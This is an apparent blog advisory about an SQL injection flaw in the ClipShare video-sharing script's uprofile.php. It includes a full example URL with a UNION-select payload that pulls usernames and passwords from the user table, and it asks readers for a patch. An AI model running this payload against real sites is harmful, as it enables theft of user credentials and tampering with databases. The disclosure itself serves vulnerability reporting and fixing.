This is the security issue primarily reported by Krit. and Pr0metheuS. ClipShare leading PHP video sharing script has an SQL injection exploit in user profile page(uprofile.php). ClipShare application does not properly sanitize user supplied UID data before using in an SQL query. Hackers can use this exploit to access or alter user database.

Exmple URI:

http://www.example.com/uprofile.php?UID=1+and+1=2+union+select+1,2,concat(uid,char(58),username,char(58),pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2
0,21,22,23,24,25,26,27,28,29,30,31,32+from+signup+limit+0,20/*

ClipShare not issued any patch to fix this issue. If you have any idea to fix this issue or have patch please share it here so others can benifited from your contribution.

Written by Bala Krishna

Bala Krishna is web developer and occasional blogger from Bhopal, MP, India. He like to share idea, issue he face while working with the code.